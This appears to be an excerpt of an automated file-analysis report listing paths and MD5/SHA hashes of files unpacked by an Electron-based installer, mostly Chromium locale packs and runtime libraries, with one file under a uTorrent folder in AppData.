SHA256 a32c3fbbf74699a10e7642bf4901191f29c88c5aec93ae7ba28c79ab28462a69
SHA512 fddd4d70dc6b8d424adfa509ad145845d13d898eaedb1706de357cf1dcd4eb25fe581c9dc58c1de0954b1a10b232934d219563a1e2e8ed1bc01412bfc789cbfc

C:\Users\Admin\AppData\Roaming\utorrent\pro\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\vulkan-1.dll

MD5 7ba000aece0d376e6f77e4c2f48f69c8
SHA1 24b103a2d9d5d742783ad3ecbfeb2cc57bd711c6
SHA256 1f8b647f161f20d45d554e349b3e5ef0b7b5da8c7bdbc1ff631d37dc9c819503
SHA512 d051ed9d1b9c28cd38da020cebe8b58da53c520f8686dc08fb9e626a9751c23fc43b97b2c309314e3f9a94f1eea448b77657c955c7b22aaadc6c0753b85f744c

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\v8_context_snapshot.bin

MD5 6503b392ac5c25ff020189fa38fbaecb
SHA1 50fb4f7b765ac2b0da07f3759752dbc9d6d9867b
SHA256 add78f3f85f0b173cbe917871821f74c5afe0a6562462762b181180d16df4470
SHA512 9c12fff1686845a2c0b43d35a8572f97e950f232f1ce5690fd1212f48c171edbcc5d725754f10a66599b0823ac0c995c7212e263b7e02ea0ed9f2d2b937fa760

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\ar.pak

MD5 98f8a48892b41e64bef135b86f3d4a6c
SHA1 32f8d57ec505332f711b9203aed969704bd97bc9
SHA256 e34d5cabaed4634c672591074057c12947bc9e728004228a9e75f87829f4a48a
SHA512 6ed3fe415b2f6de24136917da870b47c653d15c7a561baae55a285946a6f75e5141aba3bc064982f99baef0a893266693864c2d603c5c22c2b95627b2035f7a4

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\am.pak

MD5 952933d2d388683c91ee7eaa7539e625
SHA1 7a0f5a10d7d61c32577c0d027db8c66c27e56c7d
SHA256 55357baf28716a73f79ac9a6af1ae63972eb79f93c415715518027fc5c528504
SHA512 5aa5ef0ed1da98b36840389e694dc5dcef496524314b61603d0c5ee03a663bb4c753623fb400792754b51331df20ac6d9cf97c183922f19fc0072822688f988d

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\af.pak

MD5 198092a7a82efced4d59715bd3e41703
SHA1 ac3cdfba133330fce825816b2f9579ac240dc176
SHA256 d63222c4a20fa9741f5262634cf9751f22fbb4fcd9d3138d7c8d49e0efb57fba
SHA512 590dcc02bc3411fa585321a09f2033ca1839dd67b083622be412d60683c2c086aac81a27bc56029101f6158515cc6ae4def39d3f246b7499b30d02690904af0d

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\ca.pak

MD5 2f8d050c228583559cda181291b76e5a
SHA1 b047f1cfb30b1162b1dd79f7e424a83fd807eec7
SHA256 e1d6b5fd0bc411f2895eaaa1409916f5ffe39a5c6bd1bafe8af7ce33da5be17d
SHA512 e4f150cd9942ef5105e72376835da6edc31ef91783e41cd2fc04600c04f342bbc96e08e23c8af1c0c1e563bb8a7d3840a2289767525c30d08c2f23d0e837801f

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\et.pak

MD5 e97fe1e6d06a2275a20d158dc4e3b892
SHA1 1575b9b1fc331a70bbe4ca7d1095d4ed6777ecc1
SHA256 d984aee4d18ca24a88846b1b6e0294d373733430f30bb4f1b97bc7d50d512c2e
SHA512 77879a4d1062671b616ba9b2ce0b6f69a5dbed6bd56b73ded902d1f9f44ecd96a2212690b3568c0ba273c73d91589ff2bf18c7ef9b66e0630fbaafde2a61b1b1

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\es.pak

MD5 ba80f46ef6e141cef4085273a966fd91
SHA1 878f35e15b02558f75f68ec42a5cc839368c6d61
SHA256 267e7b6376e7e5ab806b16fde93bbbcd961bf0c3a7b3a2cabccab37faa9a1d16
SHA512 8a8b4f7db23d4c93756b6dc4219f00c77358a8fe992da1f51431597b82c3aa87abf3a98d79e13e7b4a14a1a9e94d388760fb6abf3a744406dee951c8e78cf361

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\es-419.pak

MD5 774ced79da2fd32bd1ba52a0f16e0a19
SHA1 ff36dcf8b62046871f441f301dd7af51cb9ce7ee
SHA256 5aff3762747a6e8c6df9f2a3b470bf231b44163006b17ce87e2a03694be27b81
SHA512 7763c15fa97efa9a5af73dcdedd4fe260139bd8ff782ca3aa0937d9355b2d14c3e482e570844ac33d22d7b016c7b9097d727c1dd585f421dccd59ca7bbc24269

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\en-US.pak

MD5 3f6f4b2c2f24e3893882cdaa1ccfe1a3
SHA1 b021cca30e774e0b91ee21b5beb030fea646098f
SHA256 bb165eaa51456b52fcbdf7639ee727280e335a1f6b4cfb91afc45222895b564f
SHA512 bd80ddaa87f41cde20527ff34817d98605f11b30a291e129478712ebebe47956dbd49a317d3eeb223adf736c34750b59b68ad9d646c661474ad69866d5a53c5c

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\en-GB.pak

MD5 502260e74b65b96cd93f5e7bf0391157
SHA1 b66d72b02ff46b89ee8245c4dd9c5b319fc2abf7
SHA256 463af7da8418d7fb374ebf690e2aa79ee7cb2acc11c28a67f3ba837cf7a0937b
SHA512 0f0f9aac8e6b28c1e116377ab8ee0ffadbf0802a4026e57aedb42d21c38fbf70159be9e0314799c1de1f7638fbbd25d289dff7cd2c9eb7c82e1b62b6c4e87690

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\el.pak

MD5 306a80dadadb1f9182810733269537fd
SHA1 bc01a65a9d024ec72e613aedc60f4838be798040
SHA256 92403b6160e38746597d4dd7f64d64cf19e30b5e7862901263c39679187b2c91
SHA512 491016b8fcca59a7dc9523358c4a7b56c55360f424e8fe9330d6f01480835805e961f1e48f8777660510d9af9a66961c639df162190dec595a867d54150eecfc

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\de.pak

MD5 ec069f60c9825080b9d18ff6492e816d
SHA1 34ce5101c9646f9c2deb9820a3b26eb91c525ebc
SHA256 e0f632ce324951002c80e019dd0169be9f6b0640533fa434cd6ca80f28a1d3f7
SHA512 95a88ac98f0957e5f200af76c1a743b976228f7da1bb6c6b3b88a54adcff05e1172d7cf2e6f0a82cbc8ad0aa79974a1bc046516250a3a5889fd7b2e4d7c0b804

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\da.pak

MD5 fecabf71853bab84eacdd95699c49f69
SHA1 8519afc13e100a550ca3d756518a0bc33674e0d3
SHA256 1b0793b1cbeb6a56ff1e64523c37ba753457320aa29f9718022caa07b4981d8f
SHA512 e932d382d41a79ece172349e916221a67d97f5fd4b2dc1325d6bd2f7c6757cbc01d6fbc8d9846f6ec462eb637210f7c650f6944418edbd3f8614ef99030d9392

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\cs.pak

MD5 26765c7be201444f0238962bb16a506b
SHA1 f9d4a33795e45127c14bcf35cc770845627e15e8
SHA256 936466784a55b965d23b016bc49377655bc5d281d012c8369c0809c961e05c74
SHA512 577d52d2d5048cd952aff1e76121a495328c1978cdea2eaa4f85812cc513917f69510e135e96f7967f4ed43cf88e180cb1d9059e17c855c8d4f94ca036730214

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\bn.pak

MD5 d6ccc9689654b84bc095cec4f1952cca
SHA1 286130971826b0af1b6d29c5283dfa71af7cd7b0
SHA256 e325d936cd97c3f9ddfca2d87caefb8b6e7465ffa31d0386ae2456b18f7a92da
SHA512 db0400820c5cd1100337c955084eac3036b55bbf66b403337bec2079bc47696e2e48a771214662b286f4f45f763d2ad423aeccbd0f06cf0bc11038662558f4a5

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\bg.pak

MD5 9dc95c3b9b47cc9fe5a34b2aab2d4d01
SHA1 bc19494d160e4af6abd0a10c5adbc8114d50a714
SHA256 fc4a59ea60d04b224765be4916090e97ed8ddda6b136a92a3827ed0fcc64bb0e
SHA512 a05a506a13ac4566ecbfe7961ace091295967ea4e72a2865e647b5fa9adac9f7cf5e80b53fae0e3917dfb0b9a3f469189cd595cc4ae9239d3a849f5cedd60e46

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\fa.pak

MD5 d55f65c6fda6ed6f549d2c9f0a4ce874
SHA1 952792f2da5ed9cb1cfed14e5afb8abf5cf29cb3
SHA256 221bbbde078d135f6daca4978a31cc6a82f8f46536467ebc9a0cd322c58a7785
SHA512 d0bb83467182d8b3a8f8371d749e682cf05f89daefe28764f2c263e7cfbfc3f86cb388061b48dadda26c3dd246dd6f7a57af58ca9344c2f6b90de87af1e91c69

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\he.pak

MD5 6376d0a5f4273b76b1f4aabade194e0c
SHA1 337ba39f09454c0779ab64872b9fa11f866d6adc
SHA256 875712bb852c698f677c0c74e088f62d31adb2bce65648fc390607aad8705c45
SHA512 00347f16b5abbaf47fb08663d5efde26ab7de0c7a2fa42e6b5f03c41a83cecbd8e78cc3aef41d5f08658cf346e0ade732774485e8a10008a43fa41ffaf73b2be

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\ml.pak

MD5 00292b0801e0dd0a74091bf53f1574c9
SHA1 63a002e7a8796bc4b4459a19c95ce426fbd1ec7f
SHA256 61a372f170de0a22712be980c3c78b22035ebf40ce79332fab75cdcc4208c9e6
SHA512 e2e15f66851aa435e3bf4de6672f4aa8b01204d8efe11ec6ee9a51d9877ec4f2e71d7e9547d6eab9bfa04af1bea71fa72aa4963fa08b48717bf1c3fd21c00cd5

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\ms.pak

MD5 d5da199f347452c5904bff9332a08f84
SHA1 b5fb8c22708a7e3130684f1a9923b6dab10c3ae5
SHA256 fe58cc4f62fc31e32c1fb9a0893a5483391ab6a91b1c92ed4a5e3103a962da7a
SHA512 9fddeb376bececc51dec997b3ed1e22821340fa172636f641af774dae8bc9b5c0780757380bf3fa8df0f9682a555ede81c449ae9468f63215c17123d13ee9f35

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\mr.pak

MD5 b9a2aa88c69c42ebcc41fef00c980a38
SHA1 9e373dfa11f95c31ffdca70bd83d2f66e1ddcef8
SHA256 481faf7dd66cf10a476d8b156fb4ea452f920322d8007f7e25d41b2837bdbc09
SHA512 5f4582723429a44dd517322babae4466efb4e8723c0247754e2a9a2929133d6fee5c3533c4cf567954e2a5aab47940a136a178405de36e38b50e8d4a6d5c504f

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\lv.pak

MD5 e664eb35f1284e9fc615e1bb4fab892b
SHA1 e777653abec377a394170b04f79e78acbe4b6a3b
SHA256 b5a31cbfcb40ad8d911de1618c4eb7e8cc67b97eb8878220f15d40eb014d8ac8
SHA512 c3232997e8d306e91ded72e9d81ffae2018af3e6c32fe620532e03bccd2883fce59b2a2290a1580d7080c468c02bcd24c1bc90051f06bfa9a4e17857d4aa583f

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\lt.pak

MD5 7b6bf901352885c0699db71239b7cf24
SHA1 9e3ec5f327c0d0e54a449332061e60a8c79243cf
SHA256 9200a9509bd77834d9912f4ba8f4219d2b9bd2cdad49a11873db30e99b9d1350
SHA512 79ebef723fb4c17581eb869b4b4e1a364a3d28df0e168e7e1a3583e0c1ec5b9716dd270925c0545b8247421a64b03705f10910fe3416900de9258840c470d580

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\ko.pak

MD5 b31780fff9541290c1d9f5b76141430d
SHA1 8b0fbdccd0a7f8141846763a0d27e4e0da0552dc
SHA256 b04c1b91cab31054be70cb851dc6716065545445801045daceb96eeee4d2334a
SHA512 a573dd09520059832e7f53386a64dcdde47452b02ce1e5d7e11385abbc8b734dcee0065b4ca351591bf9cc2f66fae204b9300702246d20265e8ddff4f7c1e6d8

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\kn.pak

MD5 d3d6bc60bead608e68e776e07d21ad30
SHA1 e40e38ca99026056c127e9e1a1ff821a50310887
SHA256 90b2df3338468e84e2cf2f2f67597cba5c3ceb5dba9c59ebd072ec15a70ce741
SHA512 05421db2f1202573a34de1e722c6bdb55a35821c4aebd54c80e6594fc92075cd9b97e5bfdfe93b4228c3a2646b92a27da4722ef3826e2807238dcc56ba273706

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\ja.pak

MD5 8209dd8cf4e416416e015ff239b7c483
SHA1 7affd1707b9eec52c26a4c17708c8471c369e2f6
SHA256 3accfd9a1833ddeedb2082fb94101beb59b555c60f42e3070e9e04a372eba84a
SHA512 6a58a1ea8a46c325cac0629f2e3b571532a9a2a342ed61ca47bd1dcee20ce0b0350e4f6d3e8e4c6903c7ba4a4592a6382bf0fcb5437febd1673b3c2ce8cd7499

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\it.pak

MD5 91391f388b4b6c12a72710c35f4c355d
SHA1 f89e6ea977a10a9f050395489285ce8c041c2c05
SHA256 c0dc0a4a87f7bb054a30eb1174c3228ea2014bd94668a7d22995b99c4937d817
SHA512 8796d69d1a8bdbc7690ded45404174b7fa0b5bec8453d79a3c85bf4707c3f32caf634c792c72ce7bda3522eceb5fc6761b696471586397064d9f1f1988ceee88

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\id.pak

MD5 881ff04e220aa8c6ed9d0d76bfa07cb8
SHA1 cacf3620d1bf85648329902216e6cdc6f588a5ba
SHA256 9210c4c4c33e7ceb5f70005a92a4fd36ca4facdd41701fdc1d2ce638db8adf22
SHA512 9134102928aa80c49bbf2b862e8079b2ee23636ce63412a4c3813f234d623ff563f5ca1ac407ddb77cecf1224896ed59ae979dcf63435d35a4f13de9c22755d5

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\hu.pak

MD5 d6904e7d1b6750d43a6478877c42618d
SHA1 919f090a6a3aa1112916f5bb0d5b73a62be43c1e
SHA256 3ec43893c6de5ec0f9433841afd5fa9feaaf59ddcef05f7e1cab14dba799887f
SHA512 d600fedb5ef1b2eb49a0122536c642b350ce67bb7a9da205890d9d13a195ac17c14607b4489715fd34506ec0ea4c80f245e09cf048aef52dcc8094f3138b2fad

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\hr.pak

MD5 7095ef4caf6bd39174487002a4e09300
SHA1 1efe686bd0b7f035aee7ab4c52be6133121cd0f3
SHA256 3d7685163c5eb6a11e745ff934312b8681c5f85dfa8d9ea701e9dcaee1e7a285
SHA512 45488d46dfe7a31a007932917f7baf4c195da899de5dc56d98e555336668af3edb77996487649b86f56beac688374ce77f8feadc01e3f84d30d83bd67631f9c1

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\hi.pak

MD5 ede7fa471c5eebc1fa55b9b3b6f92d00
SHA1 1d1f529c615799bb3a3319ddd1357cb5dc71464e
SHA256 1e9623c7407ae8b8a88df3f69a47ae8117f74c4dcb56897bb794a9c38ee5805b
SHA512 0f51ea54e828700080effa6c728230c523ff8e26fb350e6f337028d18614d5dfc4a2792cb92b5e606bd0702067f55fea546029cddd1ebf7fa74ef5521ff08338

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\gu.pak

MD5 b7f4c73d56be31042d8edd7e8ea080f3
SHA1 c0c3595701c0a75c14931ed65958d36df0d925c5
SHA256 c36a20730d5f2b91cb61b5b2a5912db2ea5a328a9b8abe0fca0af300446d3c20
SHA512 ea0d766a754604cad4d5f3180c30f7dfdc3e1cfe79d67365b72adc0d7574851f21bdd5b748b16e8b4a95ade40c8ed0442bcefd511a2934cc9c701e379c955d60

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\fr.pak

MD5 51ee1ed54fec49effd103c29677885b5
SHA1 ced6fd3354007d1ef3ea7b6689aae5213c20cc69
SHA256 1f6bc09499ee37456968a28b67b81bbf5b9df4f0c6035a388242d2037a3b65a1
SHA512 dfd50ad99b89345940afead11c3a6940d4408a0e6265cddda1d71ad92527ea00d8057ac77ceb2ffe137a3f0d2f321c210bc7cf97ed821f01e538dc08d07149a4

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\fil.pak

MD5 3126f74d021e9423d71913bb45a62935
SHA1 c9a80c8585aabbfec34ae891416794b1b3e29a11
SHA256 4cd3fa70487e894400ad29e3bfbfba3e1c5edd799aab12c62c3aff3c2580ce5e
SHA512 fb360723ee53b3f7038eebd1b919a36784a0e3dc878e810bc905c4297379dade6006c8872ed68412b06161cacb0d6e32a7157ecf97d9e103a4ca3b2b71db8765

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\fi.pak

MD5 fa7dbd2ee35587ff31fde3c7107e4603
SHA1 baaa093dcb7eccf77ce599c8ff09df203e434b60
SHA256 5339b8ca52500bd0082e0ba5a5f440c5f04733803da47963280479760c7fff2c
SHA512 587f6d0e216d1688227345a8a75b94848ee710ec633fe6805db66bb0e8cad1b8d24a1e6a7e234061516770d881571166c78d8fa1c40e6335f3dcb1339fbffc14

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\nb.pak

MD5 bbae0915edec081b04bb903b689bc40b
SHA1 6a0fc635ce1c431e512b8b3b8448176aa4025556
SHA256 d565c6c95dad89d3f2b7210de4ec3fc437633de4dcfc994fde0704b92bb53ff8
SHA512 573a9fe43213829a6a4b39e67be25bc330b417750ea6d66e26163de7a80c29f6f5deeb841d9ff8303595943a81fc01ab668aab02a5cac4eda078ed06120138b4

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\pt-BR.pak

MD5 a064cb9d7cf18936600e9ccc03297006
SHA1 eb436a0c584ba91acb05dfccde139afbe26fe9f4
SHA256 c9ec3822044365457b8736348cf95a8e39bdfe3ed36267449bf3ed739accef2e
SHA512 95af684abf9d24cfc4d0668a02da1e2e69f5e671d671d8cdfadc22ec991908c6aa5663fe1fa88ca8e85c0508f409fa6c2bbc174c53674270f2b188018d358415

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\sr.pak

MD5 fca817ed4b839b976ebcbf59cac66d68
SHA1 413efa65470319999032b6a25b3b2ee33b8cd047
SHA256 524acc64e70918a77cda43fd9b27a727645b28ad2d4cce16b327105101c8bbeb
SHA512 cb246d5c5cea30d6e7514841ab93803984cda37461a09b6c340ca64f7cbce4e1212951a4de421d928d433a619dac18454fb403b42581757b76c7eb124ce70cf2

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\tr.pak

MD5 46f9b2a35efdf1120a8a946e4f1d0115
SHA1 af7bec1fba32d912b50288a7d988440627e4ee85
SHA256 b22fc7b75c52cc142f201d5cf107d17c1b173a494a6add022127f559fb46bcb0
SHA512 cd67f9c328408a8295f224aec190c7c411a868755fc5c9e90b4985b3c41a05d6d34dd30d4a3866f6c24e1d640f4c324bfba8c7ab806a6b216151cf0a504a03d7

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\th.pak

MD5 a970b7e9d3aec2cd1b8ab798b3179f07
SHA1 bf17a7e80e01ac1704a1efdf27baf271b4c21e36
SHA256 cd80bf232f2f128a3d411f52c8039987559dbc1055f746eed6e0e8478b116dc1
SHA512 880555a2ac2f278aecb8794d8cc51f0833052e9f4ca187ed91fa35bb475e68ae3255cfe1dc074eac960c73c203e62c6b38077b266f5fab66ccc3ca73e94d4d60

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\te.pak

MD5 b1b6a9e3a04be79080ebbfacc1a0eb2d
SHA1 a5c8eb6a930062f6021d073d5f74ae146dc7fbc8
SHA256 d839531c4ff4a2885c993e0d358f78667215b0950c77a06ef01a6acff9221c5b
SHA512 bf0b163c8fc3988bfeb3cbb4b981596ce5afdf7e40149622fc3b60994e7d8efa5bb24c830036d168a6638feca48b8755aefa8640faae37055cae8fffb6a85568

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\ta.pak

MD5 f100566697a96ce1f0a0c7e0bbfbe36d
SHA1 4c80a4930ba7d174c4203c199492463242bddf62
SHA256 7e818deedd50a533851bbf08e056bf2ad8d45f442a1a61d9b48e66804ea848db
SHA512 dfa6132a5b7e819e8d326bf5ee539d9ecb2dcd7fea429c75afec2291df9eeead6fa347b01f9feaf2235bce627fd39116176195f7a3d7d74de28951f939db1645

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\sw.pak

MD5 9632dd7d883fa4deb3963ea663e0ffd4
SHA1 0db135be4b3a7c54c39e9df5034d5576b68ea92e
SHA256 690027c4a31c4aea00b7d1b32ec6cd3fa50b1eac412ae273ab15e72eb485dd6e
SHA512 3aac1857784dfecd2ae5f7c4056f58e27a966a6cb949e02eaba56fc1fc283243ed6213f17628d62d435e33fa4771eb43623f25da6510aa4ce6f2149f72ab0d37

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\sv.pak

MD5 5130a033016b45ae2c3363edb3df7324
SHA1 9f696d78b1b9efec180dc89ee0defc3ba23e6677
SHA256 3420a1fbcca5bf8c2d65d6dcb0db78b03f95f7f2fc56479a0de6e3312333ce6f
SHA512 401b71360dcacf3b1fdc411c92195051370db110863cbed37143263e7804cb24b75ff1908ee39ee848c28776df00d6edd8cc748acf3725668af7815929e8066b

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\sl.pak

MD5 4ad22c6c64dbe0fc432afaa28090c4d9
SHA1 19eb65ae52a585dbd9c25c32f22b099020c43091
SHA256 6002c129a56558832e9bd260c427c0bd2e1566e0aea3ad999f89c8e479534f9b
SHA512 94f9d34e76560059ef80fc04be4d54e52a7d934dd28747db7f0f6684243b841087245699a471a55d667623d2ce5e597a3d2c6bc37cfd7ebd2f5b8fb40e6207e7

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\sk.pak

MD5 72946b939f7bcaa98ab314cfba634e0b
SHA1 71c79a61712c8c5d3dac07a65d4c727e3b80ab17
SHA256 75f179897cad221ca6e36b47f53cead7f3fb4159ee196f1d10a5181b84e1b5b7
SHA512 2a8fa7108c58f4cb263900a555714d5638d961d14d9f4ddf8a9ab5b880afdbc5d2325fed1e158dbaf42a9cd20e8e372e6a8f52fce842a6940ea52e43e4a1f1e5

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\ru.pak

MD5 5cc0f54e022a9996773dbd64906d5580
SHA1 87c103bd69724579b478f904235e03caf61d5d79
SHA256 b4223b56ec88235819a427d60bb937eb3984076523f02a018f57819e0429bea9
SHA512 b3365fedcba50643cecf1a70297e1e67990d63ae05caa87de01a70ef6f28e0f73a9a0edb0ff80b4138c624e51aa2dac065a2d40877fc92137714ae07734c2f4a

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app-update.yml

MD5 6bbe75f97a1200c10a79800fe20f7d94
SHA1 cc0adf135c80f20cb405221c42916c2ee6a46fdc
SHA256 92c0a9a1763f04c4344f63e3e8481e6690bd88654bc23e87ae9105a4f06a156f
SHA512 4906efc6197b71e0ba7e4053d176fd2c0a744555e1a10c7202e37d925051afb2a31d2d87ff2dda5d8fe75e33139e473ccd9e14946540ae3f3b1caddd09a826b2

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\zh-TW.pak

MD5 02e9e0bc5c30ca60a869ea761fb662eb
SHA1 c5200f692544b681af8757627da430aeea4283ee
SHA256 c5061ec00bd969f76f3c0c6ff15ddacafed7491260bd8ced78118691ba57bdff
SHA512 07b5f401f89dfc36499a3e74318b471d9b2e795dc363dfd5a9394089d4783a4b51fd78e2092701b6974f1c51020f3b5f81171ce21690f8547ff3c8f3d54ce781

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\zh-CN.pak

MD5 2febe4ef32e1a3884089908f402ad62f
SHA1 e65c54adc127b78494dd6189cca71f1c7bd2a5b0
SHA256 a7ac9fda6f4cd189b75fdadc4b70cd0d369a09b66eaeb5d032678cb97ffc98f6
SHA512 8e8b030af4c952c32ec277850d5573414630ff5196eaed52820f44e9c5bd03ab6f71a8add19215b0456eed859be0d5a6f28d48e12f1677d39842f35feffd5e57

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\vi.pak

MD5 065179c466c5b7457e249f11d152b99f
SHA1 cfc05e9dfb91b2af2944aed4718fa05b43844914
SHA256 b75694e390bd2e20780b3bc72f6e1473ba45d7537c27642a7d888dfd3bb6c3bb
SHA512 fb598391a028b7d3c7e25cae21ccfde655e6f871e498767a54f7cf0d5d4e48207213cd2598ca88e4f46c303cd2d8175238a5a5b720ab37beec1873d681165a8d

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\ur.pak

MD5 ba86f1f13fdc37a2c48c1da34c84f4c4
SHA1 2f1578d0eee76e60effb63967712b15c0d56829e
SHA256 4c7affdcc324cd791d10e235da809ce7501e8005be64340b6e8bf5595647a707
SHA512 fb2fe1548574da860bf27408a4f29d781fcefc300f744f4214843f343e343ad8bae29cb7047f87f5c3277641f561c6a30e5bc9d6490afbefc7af36974305a688

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\uk.pak

MD5 3b2a976a25dca963e91df3695c502d8c
SHA1 ce7ae51211f512c3723bb43ea0de9e6debb70597
SHA256 28ea88f19b2c34699d535ca0c691449b7e4001c12e8aed8d04b2078916e88a37
SHA512 ba41ee074239afdf8f194b4ccb33060fa9655e3ccdac6a16090959d3214f8db15396b3e038d7de26c478fdd003472f680d2b6ac9a92acaf6ebf8aa258747ecc6

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\ro.pak

MD5 745a9b8c6422682f2cfa5561cc1f4022
SHA1 31e3616ef09f9b1fd1c41cf8f43e504a6f90276f
SHA256 7247470057a936d03bfa2a8776508ab66aa1040c41a4eb8f79c1e93551c74bb8
SHA512 8e0b7f98cb842a862ceca65e0166462275feed26c32c9c299aba9986d36b716a90d4a8db5ccef355ac266b7e969071014cc7ab6439778e77c52754bc23b4c575

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\pt-PT.pak

MD5 3f367760b57a5e4360dabcd4a650bc5f
SHA1 8d7cd6b0eb42361ee862455ecfa475d28f5aa934
SHA256 c89170385b3afb2ec89fbd61b8470ac718713c7296441c8430f173dac218e74b
SHA512 3dc30780d57dee91215a716dc6b4cb432838aa0161af4371f49f70db2076bd155b170fd2c1617f59e1b572144a2e150a34143eda82d9f2227d24d2281d5aba60

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\pl.pak

MD5 0dc77139d3530695cb4e85b708bc0bf6
SHA1 6915655afd1e37361c011f5c2113d72c7a0e85bc
SHA256 53b59486361b11512fb90f15065104b15ee2322bb7804f859cde2f2ecf9581fb
SHA512 ee1ca1d99ac279df4cc0e532aef2fc531061736b636a84310bdbd627e0f2435eac1a386ebb19aa901b6eae3929bda1c5da4f41b73a25a1b20137522e34547600

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\locales\nl.pak

MD5 9f547a24e2840d77339ca20625125b4c
SHA1 23366411b334f990a0328a032b80b2667fda2fcd
SHA256 55413d5eddb3300e0ae0fa5d79d26fdf1e5a12922d7018c8054b1faa9d660301
SHA512 34da7a0b58ee3904d00cf02d16d5a3ef508fb708d7c0a887286fc32cd6145b2bd857d317c784d1d1b17662041eadcf7e225908980eb93f2b81161d845c0bb67f

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\dist\electron\b67b4ab7ebbac637cf6c.dll

MD5 0487984bdd82276753613c636721e562
SHA1 b79e6f14526fc5ee7709972eff9819e608aaf0ec
SHA256 a4ae497a0c7f20e27d62f61c10c89faf70caa2fedf7e3edded03ade0cde7e95d
SHA512 d1b0e33c539ea251c93998d079bbfa0a032fb4e914551ba8608bbfa2b5dda4519da801d6ff7efb05f1e10daecea77f816906aad372ff6b1395b0144e52ba20e0

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\bin\electron-windows-sign.js

MD5 10f17bb13a83015235772c2a0af60d35
SHA1 a81e76f271a723480f8752917cc725a4d8b1e262
SHA256 e29a47096a4694c8fff9991fe7ea632bfec9bc541b944dfcdec2607a3807d3ee
SHA512 f2ee440558d708fdaca1a83c18631728ebab0239a2f9d240bab32b5087434cd53c66ea5f9e0f5d765ab4f14000f5c76fbeb6719402b847aa1274facf6886632e

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\bin\electron-windows-sign-usage.txt

